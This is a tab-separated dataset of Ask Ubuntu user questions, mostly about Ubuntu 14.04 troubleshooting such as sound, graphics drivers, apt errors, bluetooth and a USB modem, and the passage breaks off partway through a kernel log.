515653	terminal flashing between current and previous screen	i just upgraded from ubuntu 12.04 to 14.04 . after upgrading the terminal will sometimes , but not always , flash between the current screen and the previous screen . here are some examples : the output of an 'ls ' command will flash on and off the screen . but when i press enter to start a new line , sometimes -- but not always -- the output of ls will stop flashing and instead the newline will begin flashing . sometimes vim will start flashing between the current place and a previous place , such as right after a search . this also happens when i opened just sh within a bash terminal . ( i was hoping the issue was just with my .bashrc , though i have n't changed it in months and did n't have any issues in 12.04 . ) this is incredibly annoying , and has made the terminal essentially unusable.unfortunately , google-ing for a half hour has n't shown anyone running into similar problems , either on 14.04 , other versions of ubuntu , or other versions of linux . update : i 'm not sure if this helps identify the problem , but the text stopped blinking when i turned the cursor blinking off using these instructions how do i disable the blinking cursor in gnome-terminal ? . however the problem is n't totally fixed because now the text will disappear for a moment when i type .
515656	another sound not working post	tried all the other `` sound not working '' posts i think , lost count . purge/reinstall alsa and pulse , reboot , add user to audio group , various lines in the alsa config file such as `` options snd-hda-intel model= '' then tried different options like generic , auto , basic , default , etc . tried pulseaudio -k & & sudo alsa force-reload a few times , with and without rebooting . hardware : 16gb ram , core i7-4790 , intel haswell mboard with onboard sound and graphics multimedia : audio adapter : hda-intel-hda intel hdmi os : ubuntu server 14.04 with ubuntu-desktop installed . gui sound settings lists only the dummy sound card alsamixer -c 0 │ card : hda intel hdmi f1 : help │ │ chip : intel haswell hdmi f2 : system information │ │ view : f3 : [ playback ] f4 : capture f5 : all f6 : select sound card │ │ item : s/pdif │ │ ┌──┐ │ │ │oo│ │ │ └──┘ │ │ < s/pdif > │ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 aplay -l default playback/recording through the pulseaudio sound server null discard all samples ( playback ) or generate zero samples ( capture ) pulse pulseaudio sound server hdmi : card=hdmi , dev=0 hda intel hdmi , hdmi 0 hdmi audio output dmix : card=hdmi , dev=3 hda intel hdmi , hdmi 0 direct sample mixing device dsnoop : card=hdmi , dev=3 hda intel hdmi , hdmi 0 direct sample snooping device hw : card=hdmi , dev=3 hda intel hdmi , hdmi 0 direct hardware device without any conversions plughw : card=hdmi , dev=3 hda intel hdmi , hdmi 0 hardware device with all software conversions cat /proc/asound/cards 0 [ hdmi ] : hda-intel - hda intel hdmi hda intel hdmi at 0xf7d14000 irq 46 cat /proc/asound/devices 1 : : sequencer 2 : [ 0- 3 ] : digital audio playback 3 : [ 0- 0 ] : hardware dependent 4 : [ 0 ] : control 33 : : timer mplayer -ao alsa : device=hdmi /usr/share/sounds/ubuntu/stereo/system-ready.ogg mplayer 1.1-4.8 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing /usr/share/sounds/ubuntu/stereo/system-ready.ogg . libavformat version 54.20.4 ( external ) mismatching header version 54.20.3 libavformat file format detected . [ lavf ] stream 0 : audio ( vorbis ) , -aid 0 load subtitles in /usr/share/sounds/ubuntu/stereo/ ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders libavcodec version 54.35.0 ( external ) audio : 44100 hz , 1 ch , floatle , 80.0 kbit/5.67 % ( ratio : 10000- > 176400 ) selected audio codec : [ ffvorbis ] afm : ffmpeg ( ffmpeg vorbis ) ========================================================================== [ ao_alsa ] alsa-lib : confmisc.c:768 : ( parse_card ) can not find card '1' [ ao_alsa ] alsa-lib : conf.c:4248 : ( _snd_config_evaluate ) function snd_func_card_driver returned error : no such file or directory [ ao_alsa ] alsa-lib : confmisc.c:392 : ( snd_func_concat ) error evaluating strings [ ao_alsa ] alsa-lib : conf.c:4248 : ( _snd_config_evaluate ) function snd_func_concat returned error : no such file or directory [ ao_alsa ] alsa-lib : confmisc.c:1251 : ( snd_func_refer ) error evaluating name [ ao_alsa ] alsa-lib : conf.c:4248 : ( _snd_config_evaluate ) function snd_func_refer returned error : no such file or directory [ ao_alsa ] alsa-lib : conf.c:4727 : ( snd_config_expand ) evaluate error : no such file or directory [ ao_alsa ] alsa-lib : pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm hdmi [ ao_alsa ] playback open error : no such file or directory failed to initialize audio driver 'alsa : device=hdmi' could not open/initialize audio device - > no sound . audio : no sound video : no video exiting ... ( end of file ) mplayer -ao alsa : device=hw=0.3 /usr/share/sounds/ubuntu/stereo/system-ready.ogg mplayer 1.1-4.8 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing /usr/share/sounds/ubuntu/stereo/system-ready.ogg . libavformat version 54.20.4 ( external ) mismatching header version 54.20.3 libavformat file format detected . [ lavf ] stream 0 : audio ( vorbis ) , -aid 0 load subtitles in /usr/share/sounds/ubuntu/stereo/ ========================================================================== opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders libavcodec version 54.35.0 ( external ) audio : 44100 hz , 1 ch , floatle , 80.0 kbit/5.67 % ( ratio : 10000- > 176400 ) selected audio codec : [ ffvorbis ] afm : ffmpeg ( ffmpeg vorbis ) ========================================================================== [ ao_alsa ] format floatle is not supported by hardware , trying default . ao : [ alsa ] 44100hz 2ch s16le ( 2 bytes per sample ) video : no video starting playback ... a : 0.4 ( 00.4 ) of 0.8 ( 00.7 ) 0.1 % exiting ... ( end of file ) thank you for your time and help : ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- update i have now added a creative soundblaster play 2 usb sound card and disabled the onboard from the bios . on my ubuntu desktop it works right away so the hardware works for sure . on the server its not doing anything . still only a dummy output in the sound settings ( pulse ) . reinstalled/purged/etc but to no avail . alsamixer is not opening at all any more , proc/asound doesnt exist sudo aplay -l aplay : device_list:268 : no soundcards found ... lspci -v | grep -a7 -i `` audio '' 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) subsystem : asustek computer inc. device 8534 flags : bus master , fast devsel , latency 0 , irq 11 memory at f7d10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : 00:14.0 usb controller : intel corporation device 8cb1 ( prog-if 30 [ xhci ] ) subsystem : asustek computer inc. device 8534 find /lib/modules/uname -r | grep snd ( nothing )
515658	in 14.04 gnome classic , how to add icons to panel ?	i am unable to add program icons to the top panel in gnome classic . i have tried holding the alt and/or the meta key and right clicking , but get no response . i was able to do this in 12.04 . do i need to learn how to do it from a command line ?
515659	14.04 playonlinux and steam equals jittery choppy freezing video	i trying to get some windows gaming software ( warframe ) up ad running and it is running but the video is very choppy/freezes even though the reported frame rate is 60fps . i 'm using : ubuntu 14.04 nvidia 340 driver play on linux 4.2.4-2 wine 1.7.24 & 1.7.22 ( switchable ) steam 13 aug 2014 14:19:47 i used the following link to get it going warframe linux/ubuntu does anyone have any tips for diagnosing this ? anyway i think it has something to do with syncing . i would like to disable audio in steam or play on linux so i can eliminate any sound issues . how do i do this ? regards wallyz
515661	14.04.1 lts 64 bit from usb does not see my windows 7 when i go to install it	i suppose this is as much a question as a heads up/warning 14.04.1 lts only gave me the option of writing over everything on one of my windows 7 machines . if i 'd pushed the wrong button and continued i would have lost some mighty important items . on a similar windows laptop i succesfully installed 14.04.1 lts 32 bit alongside windows 7 rather easily ( and i dig it ! ) , there was a prompt in that case that let me select to install it alongside my windows os.yikes , not in this case . this laptop was formatted ntfs , the ubuntu usb pendrive i formatted fat32 . could be a clue ? it looks like there is an advanced install ubuntu , but i am not that advanced . i may try to use windows diskformat ( what fdisk is gone ? ) to make a partition , then see if the ubuntu on my usb stick `` sees '' my windows . if anybody has a better plan let me know . mahalo aha ! ? p.s . its a ssd harddrive , perhaps thats the crux ? i may have answered my own question , looks like i can not create a new partition on a ssd once its being used ( for example cant shrink volume ) because oss how ssds allocate files . i would have to back up everything , and reformat the whole drive , yuck . much easier to install a second hard drive .
515664	403 forbidden error when i attempt to install an ssh server	i have a problem when i try installing ssh-server on ubuntu 14.04 lts . what i 've done : sudo apt-get update == > succeed . sudo apt-get upgrade == > succeed . sudo apt-get install ssh == > failed . notification that i got : err http : //archive.ubuntu.com/ubuntu/ trusty-update/main openssh-sftp-server i386 1:6.6p1-2buntu2 403 forbidden e : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh-sftp-server_6.6p1-2ubuntu2_i386.deb 403 forbidden e : unable to fetch some archive , maybu run apt-get update or try with -- fix-missing ?
515667	sudo apt-get update command not working	i 'm on ubuntu 14.04 and i tried running sudo apt-get update but i get the below error : w : failed to fetch http : //ubuntu.tuxuri.com/ubuntu/dists/trusty-security/inrelease w : failed to fetch http : //ubuntu.tuxuri.com/ubuntu/dists/trusty-backports/release.gpg unable to connect to ubuntu.tuxuri.com : http :
515669	read-only filesystem recovery mode not working	i have seen other posts of this before , but they did n't help . in short , today i was trying to play colobot on my ubuntu trusty computer , when i tried to access the directory the game was in by terminal , bash warned me that the disk was in a read-only state . i reboot and boot into recovery mode , there i did fsck , it threw errors , but apparently failed to fix them . at that point i was getting annoyed and searched the internet , once i found an answer , i ran the grub and dpkg options in recovery mode , recovery mode said it was read/write , but when i boot in , i get the same thing , read-only . so i reboot into recovery mode , and tada ! it 's read-only again . i ca n't think of anything else to do , as the other people who had the same problems had them fixed by the steps i did . i got all my important files backed up to both a separate partition and a separate computer , so no worries there . i just need help getting this to work , as my computer might as well be a brick if i cant do f/a on it
515671	integrated webcam not being detected	i am having a problem with my laptops integrated cam . its a brand new laptop and the cam worked in windows 8 . but i dont do windows . so i installed ubuntu 12.10 and the cam did work ... but i then went with 14.04 now and i get no webcam action . my laptop is asus x551ca-ri3n15 . this is the results from the command ... bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b404 chicony electronics co. , ltd bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 12c9:1001 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i thank all for the help ahead of time .
515681	purple screen when booting on lenovo g505s	i successfully installed ubuntu 14.04 . i 'm having the purple screen issue however even after making the nomodeset changes . it remains stuck on a purple screen . i can navigate through the menu options i.e ubuntu , advanced options for ubuntu , memory test , windows recovery environment and windows 8 . i ca n't even boot into windows 8 . i 'm totally new to this . if someone could please provide step by step instructions , that would be most appreciated .
515686	errors when attempting to setup snapshot post lvm setup	i have been given assistance in setting up my lvm to be able to use snapshot in a previous ubuntu thread though at this point i just can not figure out how to get my snapshot setup so that i could feel safe installing stuff on ubuntu ( when i was on windows i used images though idfk how to properly setup the ubuntu equivalent so i feel i 'm standing in the middle of a iced lake with ice cracking sounds ) i 'm running ubuntu 14.0.4 on a 2010 laptop with one storage device which no longer will support my device at the same time windows spits out errors when i try doing anything . here is how my partitions look below if that helps . https : //www.dropbox.com/s/ydjypertcs3y4dz/0_partitions.png ? dl=0 the below url is where i 've started thanks to the original thread i had made asking how to utilize lvm . http : //www.switchroot.com/how-to-rollback-a-lvm-volume-to-its-snapshot thank you so much to the ubuntu community for getting me this far ! btw i 'm making an opening post and comments because i have too many links and can only post 2 without having 10 reputation ?
515690	how to fix , '' system is running in low quality graphics mode ? ''	i recently changed my graphics driver over to nividea 314.22 ( i think ) everything was fine . until i turned my laptop off then on again . i had done that multiple times and had no problems . the today randomly it says it ca n't detect the screen , graphics card , and input device . reviewing some logs i think i found the issue . under one of the options i found '' allowemptyintialconfiguration '' `` on '' i have no way of changing that option ( that i know of because it is just a log message ) so what i am looking for is the command process behind switching the graphics driver back to the original one ( if that is the problem ) . if that is not the problem i would like to see the commands behind fixing it . please help my laptop is basically a brick right now .
515692	nating ports selection using hardware detection	i have a linux box to be used as a router with a wlan port in ap mode . the internet input to the board may come from either an eth port ( wan mode ) or another wlan port . there is also vpn running that is optional . also there are more eth ports to be used in lan mode . now , i 'm looking for a way to detect ( using a script ) what is my current hardware configuration i.e whether internet is coming from a wired eth interface or from a wlan interface and what is the name of that interface ( since there are multiple wlan/eth ports in the hardware ) . i need this info , since during nating in ip-tables , the commands need to change as per internet source interface name . also , if vpn is enabled , nating commands will change to tun0 as the internet source . how do i script all this detection based . i have the setup running fine with manual changes to ip-tables , hostapd , udhcpd etc everytime hardware config changes , but i need to automate this stuff now . help appreciated ! pushy
515694	updating from ubuntu 13.10 to 14.04.1 and graphic driver ?	i have a question regarding ubuntu os v. 13.10 update to the newest version of 14.04.1 . does this update alter the current driver setup what i have installed ? most importantly , does it affect the current nvidia graphic 's card driver ? it took some time to get the correct proprietary driver installed for my nvidia graphic 's card on my desktop computer . i would n't wa n't to lose my graphic 's card configuration after this os update . thanks !
515696	thinkpad t20 not booting from 14.04.1 32-bit cd	a have download and burned ubuntu 14.04.1 32-bit to a disc to install on my ibm thinkpad t20 , but it wont boot . it just sits there at a black screen with a blinking cursor ( ca n't type anything either ) . here are my specs : computer : ibm thinkpad t20 hard drive : 18.63gb ( not including 2.69gb taken for windows ) os : windows xp ram : 512mb i have tried restarting with the cd in the drive , and powering on with cd in drive . i have also made it boot first from the cd . i even created a separate partition . any help ? thanks ! : )
515697	get back the original ubuntu desktop after removing mate	i 've installed ubuntu 14.04 and later installed mate desktop environment . i did not like it and wanted to switch back to ubuntu unity . i removed mate desktop from the system also . but i have several issues . loading screen while booting shows ubuntu-mate background . login screen still the same as of mate 2 network icons at top bar little slower than before to load the whole desktop after pressing putting password on login screen . please help me get back to original ubuntu . edit followed the following link to install it . http : //www.omgubuntu.co.uk/2014/08/install-mate-desktop-ubuntu-14-04-lts sudo apt-add-repository ppa : ubuntu-mate-dev/ppa sudo apt-add-repository ppa : ubuntu-mate-dev/trusty-mate sudo apt-get update & & sudo apt-get upgrade sudo apt-get install -- no-install-recommends ubuntu-mate-core ubuntu-mate-desktop and then just switched back using the option in login page ( choosing the desired desktop env ) . after i see loading pages are still mate based , i tried to remove .. sudo apt-get remove ubuntu-mate-core ubuntu-mate-desktop still same login page and loading page , then tried changing display manager to lighdm sudo apt-get install lightdm and choosing the default as lightdm and tried sudo apt-get install ubuntu-desktop still no luck . : (
515698	where is network layer protocols	that 's all i can find tcp source code on my ubuntu , also the place of data link layer is on the network interface . so where is network layer protocols on ubuntu ? also i am looking for routing table network protocols like ip , icmp
515699	network bridge not forwarding traffic from span port on router	i want to run several security network tools in lxc containers like ntopng , suricata , snort , etc . i hooked one of my server 's nic 's up to a port that is spanned to my firewall ... so basically this nic would see all of the traffic that 's passing through the firewall . i added a bridge with brctl , and added the interface to the bridge . but no traffic was passed to the containers through the bridge ... use_lxc_bridge= '' false '' is set in the lxc configuration . -i forward -m physdev -- physdev-is-bridged -j accept is in before.rules on the base installation . the lxc containers are using veth mode . if i set the network type to phys things work ( for one container at a time ) , but this wo n't work if i want to run multiple tools !
515701	how to rename various file extension into an extension	i have many files in a directory with various extension ( files.txt , files.html , files.jpg , etc ) . i need to change all the extension of these files into an extension ( files.ext.backup ) . so , i will change : *.txt == > *.txt.backup *.jpg == > *.jpg.backup and so on . i realized that i need to change the extension of each type , but at least i do n't have to change them one by one . how should i do that ?
515702	firefox properties	i 'm trying to access firefox properties , more specifically the launcher options i 'm given following instructions : ubuntu ( and other gnome-based distributions ) : click on the preferences menu and select main menu . the main menu window appears . click on the program group called internet . select firefox web browser and click on the properties button . the launcher properties window appears . insert the string env ld_preload=/usr/lib/libgl.so.1 before the text specified in the command field : however when i click on firefox web browser under the program group called internet it simply opens another window , if i right click on it it also opens another window , where may i find the `` properties button '' ?
515704	unable to share desktop while using webex	while using webex , i am not able to share desktop . an error message shows that `` java is not enabled '' , but i 've installed jdk7.4 . i am using ubuntu 13.10 .
515705	lubuntu 14.04.1 , new installation . error : `` unable to mount /boot ''	this is a nearly new install of lubuntu 14.04.1 lts and i 'm getting an error at beginning of every boot , beginning about the 6th boot after install . the pc is a 2004 hp ze4200 laptop : 1.8 ghz celeron m with 1 gb ram and 80 gb drive . was running fine on winxp sp3 and i cleaned the drive off to test lubuntu 14 lts . no anti-virus is installed yet . the error : as the pc gets going , several lines of code reffing items not loading and/or mounting go by ... too fast to read most of it . next , the beginning boot screen shows and the lubuntu graphic with 5 load dots appears . the dots change color sequentually as expected . quickly , an error appears under this . most of it says : `` error unable to mount /boot '' . i 'm given the options of `` s '' to skip or `` m '' manual recovery . the `` m '' is n't helpful ... i do n't know linux commands like i do dos . so i click `` s '' . the password screen appears and i enter it . desktop loads . all seems fine ... almost . { the following may be separate problem } next , irregularly , as destop loads , i may get 2 internal error notices which overlap each other . for each had to use my password to get to show info and report windows ... ( password needed for everything ... i 'm really getting tired of that ! ! ! ) when they do appear , i select details . the list of info is long and will not let me select any of it for a `` right click > copy '' . so , the general reasons are below : 1 ) `` lxpanel 0.6.1-0ubuntu3 '' has crashed 2 ) `` aptdaemon 1.1.1-lubuntu5 '' has crashed also , as i type this error report , sometimes cursor jumps to unexpected locations on leafpad . and firefox too i just noticed ( but not as much ) . ( note : i have manually disabled the touchpad to stop `` palm dragging '' and no inputs are being accepted by it . ) i have not yet found equivolent of winxp `` device manager '' to tell me what hardware did n't load correctly . finally , i have done recommended updates online the day after install ( today ) . the problems occurred before and after . so , what 's going on and how do i get past these errors ?
515706	mozilla firefox is installed but not showing for click to run	i 've downloaded latest firefox from it 's official website and there was a file ending with .bz2 got downloaded in my downloads folder . i google it to extract using tar xjf file.tar.bz2 . now i 've one folder named firefox in downloads . under firefox folder there are lots of files including firefox ( type is program ) , whenever i click on it firefox runs flawlessly , but when i search it to run like normal files under unity , it does n't show up there . please suggest . edit : i checked there is no install or install.txt file to follow instructions .
515707	sound recorder can not record sound in ubuntu 14.04 as it has no format to record the sound to	please edit the heading , i could not think of anything but that . i installed sound recorder in ubuntu 14.04 and after installing i tried to record sound but the record as field was empty , it had no option . here is a screenshot of sound recorder : how do i fix this. ? thank you people
515710	usb modem installation	i am new to linux . i 'm using ubuntu 12.04 lts . i have iball 3.5g connect usb modem . i can use the dongle on windows , but i failed to use the dongle on ubuntu . help me to solve this problem .
515713	i do n't know what to do can some one help me ?	it like this ... > > > /etc/sudoers : syntax error near line 23 < < < > > > /etc/sudoers : syntax error near line 25 < < < sudo : parse error in /etc/sudoers near line 23 sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin
515714	lsusb output has me scratching my head	i do n't know if this is normal or not but i have an android device connected via usb in the charge-only mode the output of the lsusb command shows the vendor/product id as 0bb4:0ca3 but when i enable usb tethering on the android device , the output of lsusb now shows the product id has changed to 0bb4:0ffe is this normal for the id of a device to change ? maybe the connection settings for the android display a different id for each setting ?
515715	in ubuntu 12.04 server after booting there nither graphical mode coming and not terminal coming . what to do for recovery of the system and data ?	before few days , when i was started my ubuntu server than after booting there is out of range error comes and system restarts or no display appear . and after doing some restarts it will not showing anything , when restarts nothing is coming only a purple screen is coming . and when doing after pressing right shift at the time of booting the recovery mode is coming . but it is showing that : the system may have suffered a hardware fault , such as disk drive failure . attempting to start the raid in degraded mode . mdadm : create user root not found . mdadm : create group disk not found .
515718	why do i have to use command line terminal for nearly every program install ?	i 'm a pc tech with dos , win and mac experience going back to ~1985 . now i 'm checking out the state of linux for home pc 's and i am setting up my 1st linux pc since 2006 . reviews i found say lubuntu 14.04.1 lts would work well on my old laptop , acting much like winxp in most respects , and i installed it yesterday . setting options to make it look and feel like xp are interesting and a bit geeky , but successful for 90 % of the gui interface . today , security is my 1st order and your avware recommendations have led me to look up avast and others . however use of a stone age terminal is ubiquitous . as an example : i 've just gone to avast to download the install file . 1st checked the faq for which file to d/l and how to install it . at this urllink : http : //www.avast.com/faq.php ? article=avkb131 # idt_0100 you will see this is nowhere as easy as a windows pc to do . last time i had to command line an av install was 2004 on win98 when i used the dos version of fprot to run a pre win98 loadup scan on an infected machine . to download and install most common programs , like avware , in mac or win it 's maybe 6 mouse clicks , download to finish and restart . as various articles state , all the linux avware ( and nearly everything else ) are command line install . this sort of gymnastic is a major stumbling block for linux popularity and acceptance by the home user and why linux has maybe 1 % installed representation . perhaps you should enlighten us , the non-linux cognicenti , about why linux program installation is built to be difficult vis a vis windows-mac conventions . ease of use is very important ! i want to enjoy my pc and linux , not slide back into the dos-unix command cave if at all possible . cars do n't have cranks any more to start them . metaphorically , why must most linux installs ? ? my experiences will get passed on to others trying to leave the win-mac world . thank you !
515720	disk space expansion for joomla !	i am running a joomla website that is having a lot of media content . it is placed under the usual htdocs/images/videos folder of my xampp installation in ubuntu . the hard disk space is only 40 gb and we have 180 gb of windows partition . could anyone please suggest how to increase my ubuntu disk space using windows partition ... . secondly , can i have my media content placed in windows partition to joomla ; which means media is placed in windows partition but running in joomla installed in ubuntu . will lvm solve the long term problem of adding new disks without making fresh installs etc ... .
515723	is this normal ?	so , i installed ubuntu , when it finishes installing it spits out the disk and there is a purple and white mosaic on my screen , is this normal ? using ubuntu 14.04 desktop-amd64+mac.iso thank you in advance .
515724	installing hidpoint on a newer kernel	i just tried to install hidpoint on my 14.04 machine , to handle the special keys of my logitech mx 3200 . however , the installer wo n't play nice - it 's complaining that i have an unsupported kernel . i 'm currently using the 3.13.0-34-generic kernel . is there really going to be any problem ? the installer is advising me to not proceed .
515725	how to avoid unity lens to capture the meta key so i can use emacs ?	when i use the graphical emacs and i want for , for example , execute m-x . as soon as i press the meta key the unity dash opens and i lose focus from emacs , this is really annoying . how do i avoid unity capturing it ?
515727	ubuntu 14.04 hdmi stripes on screen during mouse movement	i 've installed ubuntu 14.04 64 bit on acer 5738z laptop with radeon mobility 4500 series . i got issue with external screen ( eizo fs2331 ) , it 's connected to laptop througth hdmi . when i use computer with ubuntu 14.04 , stripes periodicaly appears on the screen ! . it looks like it would be some noise/interferention . this problem is only appears on ubuntu 14.04 . normally screen works fine with laptop thorugth hdmi on windows or on older versions of ubuntu.at least there is no stripes . i attached screen and video ( on 0:05 sec you can see this stripes ) to show you exactly how problem looks like . thank you for help here is link to youtube and the picture
515731	why am i getting such error ?	why am i getting such error ? ( gedit:2489 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files
515732	how to install umbrello packages ( manually ) ?	i tried installing umbrello software from ubuntu software centre , but it is always showing `` failed to download packages , check your internet connection '' . so i tried to install using alternative method , by copying .deb 's from /var/cache/apt/archives from another computer . there i came to know it is not only single deb for umbrello ( because umbrello named package was only 2.2 mb while the size in software centre it is 60+ mb to download ) , so after arranging items according to modified date , i copied over 79 .deb 's and pasted in my archives folder . now the problem is when i opened umbrello.deb or any deb 's related to umbrello , it will open from ubuntu software centre and again asks me to download whole software . it is not considering the packages as downloaded . how to install these packages manually or is there any main deb that i have to run which could automatically refer other deb 's while installation ?
515733	high cpu usage compared to winxp . common aps and actions use 100 % cpu cycles	i 'm running lubunto 14.04.1 lts . pc is a 2004 hp ze4200 laptop : 1.8 ghz celeron m with 1 gb ram and 80 gb drive . was running fine on winxp sp3 and i cleaned the drive off to test lubuntu 14 lts . no anti-virus is installed yet . i enabled the cpu resource monitor to see how various programs drag the os . using firefox 31 online right now , i see doing basic functions like openning a new tab and scrolling down a page are using 100 % cpu time , ocassionally for 10-30 seconds . in fact some pretty basic aps like leafnote hit 100 % for a second . wordpad never did that . lubuntu software center locks things up at 100 % for 10 seconds . just typing here shows a 60-80 % spike every character . running the mouse around the screen for 10 seconds results in a sustained 100 % load during that time . right now , if i let the pc rest just idling firefox and not doing anything with it , cpu use bounces from 20-40 % all by itself . winxp idles at 2-10 % and it 's considered not good for it to be above 20 % ... something odd must be happening . sure , xp will give similar higher cpu cycles with program use , but it 's not locking and slogging like this . lubuntu is supposed to be a light os and by memory usage it is and i 'm happy since this is an old pc maxed for memory upgrades . however , being used to doing some tuning and wary of abnormalities going on in the background , the cpu use indicates things going on that i want to know about and perhaps apply a tweek or two . recommendations are appreciated . and this 300 point `` new tags '' restriction bites !
515737	p2v failed ( error message attached )	i want to convert physical ubuntu 12.04 to a virtual server using vmware converter 5.5.2 you can see in the following image the hard disk settings for the physical server in the conversion wizard after the conversion complete i tried to power up the converted one but this is what i got would you please advise me how to fix it thank you
515742	ubuntu issues when upgrading from 12.04 to 14.04	i 've upgraded from ubuntu 12.04 to 14.04 . there were display driver issues and i could only work in a terminal . i have installed the nvidia drivers from here . during the installation there seemed to be some conflicts with the existing installations nvidia-304* and was prompted to remove them and install the new drivers instead . now , when i reboot the nvidia logo flashes a few times then nothing happens ; there is a cursor on the top left of the display . typing : ctrl + alt + f1 does not produce any result . i have dropped into the recovery mode root console and have tried to remove all nvidia installations by running : sudo apt-get autoremove nvidia-304* sudo apt-get -- purge remove nvidia-304* the following is displayed : w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt e : the package lists or status file could not be parsed or opened . also , networking is disabled . how is it possible to reinstall the drivers ?
515748	what does init on ubuntu do ?	i already know that init is the magical program that is needed for booting your computer and managing runlevels , but what is it 's real purpose ? why do we even need init in the first place ? why ca n't the bootloader tell upstart what programs to run and not run ? this question in ( late ) response to my what would happen if init was deleted ? question .
515749	bluetooth automatic mouse connection not working	i 'd like my hp bluetooth mouse x4000b ( no usb dongle ) to connect automatically when starting my hp laptop ( ubuntu 14.04 ) , but i ca n't succeed in it : i 'm forced to do it manually by clicking the connect button . i know this topic has been answered many times , but no solution worked for me . here 's what i tried so far : creating the file /etc/default/bluetooth with lines : hidd_enabled=1 hidd_options= '' -- connect f0:65 : dd:7d : ec : a0 -- server '' putting hciconfig hci0 reset at the end of /etc/init.d/bluetooth putting /etc/init.d/bluetooth stop sleep 1 /etc/init.d/bluetooth start in /etc/rc.local none of these solution worked , i 've read a lot of topics but could n't find a solution ... that 's why i 'm asking that here , hoping you can help me troubleshooting that . update : ray @ ray-hp-elitebook-840-g1 : ~ $ hciconfig hci0 : type : br/edr bus : usb bd address : f8:16:54:02:9f:62 acl mtu : 1021:5 sco mtu : 96:5 up running pscan iscan rx bytes:4672039 acl:306914 sco:0 events:6516 errors:0 tx bytes:36591 acl:372 sco:0 commands:401 errors:0 ray @ ray-hp-elitebook-840-g1 : ~ $ bluez-simple-agent hci0 f8:16:54:02:9f:62 creating device failed : org.bluez.error.connectionattemptfailed : page timeout
515753	cdc-acm driver : this device can not do calls on its own . it is not a modem	i am using beagleboard-xm with 3.12 kernel and ubuntu rootfs from robert nelson 's site . i use a telit he910 gps+gsm modem along with my project .so as per the hw user guide i have to apply a logic high for 5s on the input of this modem for enabling it so when i does this by toggling the gpio pin for 5s using a script i 'm getting some messages on the terminal i am sure this message comes from the driver in usb/class/cdc-acm.c but could n't find the reason behind this ? how can i solve this issue ? ? root @ arm : ~ # ./modem_on.sh turning on telit modem ... ... going to sleep and toggle [ 70.791381 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 74.390258 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 74.406890 ] cdc_acm 1-2:1.2 : this device can not do calls on its own . it is not a modem . [ 74.462188 ] cdc_acm 1-2:1.4 : this device can not do calls on its own . it is not a modem . [ 74.478363 ] cdc_acm 1-2:1.6 : this device can not do calls on its own . it is not a modem . [ 74.495269 ] cdc_acm 1-2:1.8 : this device can not do calls on its own . it is not a modem . [ 74.510040 ] cdc_acm 1-2:1.10 : this device can not do calls on its own . it is not a modem . [ 74.530090 ] cdc_acm 1-2:1.12 : this device can not do calls on its own . it is not a modem . [ 74.619720 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 74.634429 ] cdc_acm 1-2:1.2 : this device can not do calls on its own . it is not a modem . [ 74.649475 ] cdc_acm 1-2:1.4 : this device can not do calls on its own . it is not a modem . [ 74.664459 ] cdc_acm 1-2:1.6 : this device can not do calls on its own . it is not a modem . [ 74.678741 ] cdc_acm 1-2:1.8 : this device can not do calls on its own . it is not a modem . [ 74.693389 ] cdc_acm 1-2:1.10 : this device can not do calls on its own . it is not a modem . [ 74.708099 ] cdc_acm 1-2:1.12 : this device can not do calls on its own . it is not a modem . script complete ... ... ... . the realted necessary portion of dmesg is below [ 30.623107 ] init : plymouth-upstart-bridge main process ended , respawning [ 70.629943 ] usb 1-2 : new high-speed usb device number 2 using ehci-omap [ 70.782501 ] usb 1-2 : config 1 interface 0 altsetting 0 endpoint 0x81 has an invalid binterval 255 , changing to 11 [ 70.782592 ] usb 1-2 : new usb device found , idvendor=058b , idproduct=0041 [ 70.782623 ] usb 1-2 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 70.791381 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 70.801483 ] cdc_acm 1-2:1.0 : ttyacm0 : usb acm device [ 73.041625 ] usb 1-2 : usb disconnect , device number 2 [ 74.209930 ] usb 1-2 : new high-speed usb device number 3 using ehci-omap [ 74.369049 ] usb 1-2 : new usb device found , idvendor=1bc7 , idproduct=0021 [ 74.369110 ] usb 1-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 74.369140 ] usb 1-2 : product : telit wireless module [ 74.369171 ] usb 1-2 : manufacturer : telit wireless solutions [ 74.369201 ] usb 1-2 : serialnumber : 357164042197668 [ 74.390258 ] cdc_acm 1-2:1.0 : this device can not do calls on its own . it is not a modem . [ 74.400207 ] cdc_acm 1-2:1.0 : ttyacm0 : usb acm device [ 74.406890 ] cdc_acm 1-2:1.2 : this device can not do calls on its own . it is not a modem . [ 74.416900 ] cdc_acm 1-2:1.2 : ttyacm1 : usb acm device [ 74.462188 ] cdc_acm 1-2:1.4 : this device can not do calls on its own . it is not a modem . [ 74.472259 ] cdc_acm 